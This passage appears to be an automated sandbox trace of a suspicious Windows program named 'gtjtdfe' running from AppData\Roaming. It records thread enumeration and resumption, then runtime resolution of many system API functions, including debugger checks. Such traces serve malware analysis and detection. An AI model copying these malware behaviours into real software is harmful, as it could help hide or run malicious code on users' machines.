Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.609] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.609] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.609] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.609] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.610] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.610] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.610] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.611] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.611] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.611] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.611] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.612] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.612] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.612] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.612] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.613] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.613] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.613] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.614] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.614] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.614] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.614] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.615] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.615] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.615] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.615] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.616] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.616] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.616] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.617] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.617] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.617] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.617] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.618] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.618] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.618] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.618] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.619] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.619] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.729] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.729] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.729] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.730] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.730] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.730] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.730] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.731] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.731] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.731] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.732] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.732] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.732] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.732] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.733] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.733] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.733] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.733] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.734] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.734] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.734] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.735] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.735] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.735] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.735] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.736] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.736] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.736] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.737] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.737] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.737] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.737] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.738] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.738] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.738] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.738] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.739] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.739] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.739] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.740] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.740] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.740] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.740] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.741] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.741] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.741] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.741] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.742] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.742] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.742] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.743] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.743] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.743] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.743] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.744] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.744] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.745] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.745] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.745] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.745] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.746] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.746] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.746] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.746] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.747] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.747] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.747] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.748] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.748] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.748] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.748] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.749] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.749] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.749] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.749] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.750] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.750] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.750] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.751] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.751] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.751] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.751] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.926] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3c0) returned 0x8c [0174.926] ResumeThread (hThread=0x8c) returned 0x1 [0174.926] CloseHandle (hObject=0x8c) returned 1 [0174.926] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x998) returned 0x8c [0174.926] ResumeThread (hThread=0x8c) returned 0x1 [0174.926] CloseHandle (hObject=0x8c) returned 1 [0174.948] CloseHandle (hObject=0x88) returned 1 [0174.948] VirtualQuery (in: lpAddress=0x790a78, lpBuffer=0xd0fb6c, dwLength=0x1c | out: lpBuffer=0xd0fb6c*(BaseAddress=0x790000, AllocationBase=0x770000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.948] GetProcessHeap () returned 0x770000 [0174.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x790a78 | out: hHeap=0x770000) returned 1 [0174.948] VirtualQuery (in: lpAddress=0x790968, lpBuffer=0xd0fb6c, dwLength=0x1c | out: lpBuffer=0xd0fb6c*(BaseAddress=0x790000, AllocationBase=0x770000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.948] GetProcessHeap () returned 0x770000 [0174.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x790968 | out: hHeap=0x770000) returned 1 [0174.948] RtlExitUserThread (Status=0x0) Process: id = "38" image_name = "gtjtdfe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe" page_root = "0x5d6ec000" os_pid = "0x5b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x6ac" cmd_line = "\"C:/Users/5p5NrGJn0jS HALPmcxz/AppData/Roaming/gtjtdfe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 285 os_tid = 0x7ec [0175.523] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0175.647] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleMode") returned 0x76c4a77d [0175.647] GetProcAddress (hModule=0x76c20000, lpProcName="ReadConsoleInputA") returned 0x76cd6f53 [0175.647] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0175.647] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0175.648] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0175.649] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="SetHandleCount") returned 0x76c3cb29 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedDecrement") returned 0x76c313f0 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0175.650] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0175.651] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCreate") returned 0x76c34a2d [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathA") returned 0x76c5276c [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0175.652] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileA") returned 0x76c5d53e [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempFileNameA") returned 0x76c59d3f [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalFree") returned 0x76c35558 [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileA") returned 0x76c3e2ce [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLanguageGroupsA") returned 0x76cc51fa [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryA") returned 0x76c5d526 [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0175.653] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventA") returned 0x76c3328c [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSetInformation") returned 0x76c35651 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleTitleA") returned 0x76cd67e3 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameA") returned 0x76c3e2c1 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeW") returned 0x76c3418b [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryA") returned 0x76c41834 [0175.654] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryA") returned 0x76c5d4f6 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryW") returned 0x76c41260 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryW") returned 0x76c35611 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedIncrement") returned 0x76c31400 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="GetWindowsDirectoryA") returned 0x76c52b0a [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0175.655] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0175.655] LoadLibraryA (lpLibFileName="ACTIVEDS.dll") returned 0x74450000 [0175.656] GetProcAddress (hModule=0x74450000, lpProcName=0x1d) returned 0x74456d3d [0175.656] GetProcAddress (hModule=0x74450000, lpProcName=0x1e) returned 0x74456d83 [0175.656] LoadLibraryA (lpLibFileName="AVIFIL32.dll") returned 0x74710000 [0175.656] GetProcAddress (hModule=0x74710000, lpProcName="AVIFileCreateStreamA") returned 0x74716198 [0175.656] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0175.656] GetProcAddress (hModule=0x75ad0000, lpProcName="GetTextExtentPoint32A") returned 0x75aed349 [0175.656] GetProcAddress (hModule=0x75ad0000, lpProcName="SetViewportOrgEx") returned 0x75ae86cc [0175.656] GetProcAddress (hModule=0x75ad0000, lpProcName="LineTo") returned 0x75aeb9e5 [0175.656] GetProcAddress (hModule=0x75ad0000, lpProcName="SetWindowExtEx") returned 0x75af1ace [0175.656] GetProcAddress (hModule=0x75ad0000, lpProcName="GetDeviceCaps") returned 0x75ae4de0 [0175.656] GetProcAddress (hModule=0x75ad0000, lpProcName="ExcludeClipRect") returned 0x75aea066 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="SetMapMode") returned 0x75aeb02f [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="Ellipse") returned 0x75b14492 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="CreatePen") returned 0x75aeba4f [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="SetViewportExtEx") returned 0x75af19e2 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateICA") returned 0x75ae7c2e [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="SetPixelFormat") returned 0x75b1594c [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="GetStockObject") returned 0x75ae4eb8 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateSolidBrush") returned 0x75ae4f17 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="TextOutA") returned 0x75aeeda3 [0175.657] GetProcAddress (hModule=0x75ad0000, lpProcName="MoveToEx") returned 0x75ae8ee6 [0175.657] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x73ad0000 [0175.658] GetProcAddress (hModule=0x73ad0000, lpProcName="GdiplusStartup") returned 0x73af5600 [0175.658] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0175.658] GetProcAddress (hModule=0x75220000, lpProcName=0x1a5) returned 0x752526fa [0175.658] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0175.658] GetProcAddress (hModule=0x75fd0000, lpProcName="SHBrowseForFolderA") returned 0x7621dc6a [0175.658] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0175.658] GetProcAddress (hModule=0x75340000, lpProcName="StrChrA") returned 0x7534c5e6 [0175.658] GetProcAddress (hModule=0x75340000, lpProcName="PathAppendA") returned 0x7534d65e [0175.658] GetProcAddress (hModule=0x75340000, lpProcName="PathCombineW") returned 0x7535c39c [0175.658] GetProcAddress (hModule=0x75340000, lpProcName="PathCreateFromUrlA") returned 0x7536c1e9 [0175.658] GetProcAddress (hModule=0x75340000, lpProcName="PathFileExistsW") returned 0x753545bf [0175.659] GetProcAddress (hModule=0x75340000, lpProcName="PathBuildRootW") returned 0x7535b265 [0175.659] GetProcAddress (hModule=0x75340000, lpProcName="PathUnquoteSpacesA") returned 0x7536ecc7 [0175.659] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="LoadCursorA") returned 0x74f5dad5 [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="CheckMenuItem") returned 0x74f6a88c [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindow") returned 0x74f5926e [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="DialogBoxParamA") returned 0x74f9cb0c [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="ValidateRect") returned 0x74f67849 [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="EndPaint") returned 0x74f61341 [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="DestroyWindow") returned 0x74f59a55 [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="SetCursor") returned 0x74f641f6 [0175.659] GetProcAddress (hModule=0x74f40000, lpProcName="GetSystemMenu") returned 0x74f66ea6 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="ScreenToClient") returned 0x74f6227d [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowRect") returned 0x74f57f34 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="PostQuitMessage") returned 0x74f59abb [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="GetWindowDC") returned 0x74f58048 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="FillRect") returned 0x74f60eb6 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenuItemID") returned 0x74f6a725 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="SetKeyboardState") returned 0x74f814b2 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="SetCapture") returned 0x74f7ed56 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="GetSubMenu") returned 0x74f66d73 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="LoadBitmapA") returned 0x74f67cc2 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="IsClipboardFormatAvailable") returned 0x74f68676 [0175.660] GetProcAddress (hModule=0x74f40000, lpProcName="GetParent") returned 0x74f60f68 [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="LoadMenuA") returned 0x74f74eef [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="LoadIconA") returned 0x74f5dafb [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="IsWindowEnabled") returned 0x74f62c1b [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="MenuItemFromPoint") returned 0x74fb874b [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="GetClientRect") returned 0x74f60c62 [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="CreateMenu") returned 0x74f657a4 [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="SendMessageA") returned 0x74f6612e [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="BeginPaint") returned 0x74f61361 [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="GetIconInfo") returned 0x74f649ea [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="GetUpdateRect") returned 0x74f7d41f [0175.661] GetProcAddress (hModule=0x74f40000, lpProcName="GetDC") returned 0x74f572c4 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="DrawFocusRect") returned 0x74f689c2 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetKeyboardState") returned 0x74f7ec68 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetForegroundWindow") returned 0x74f62320 [0175.662] GetProcAddress (hModule=0x74f40000, lpProcName="GetMenu") returned 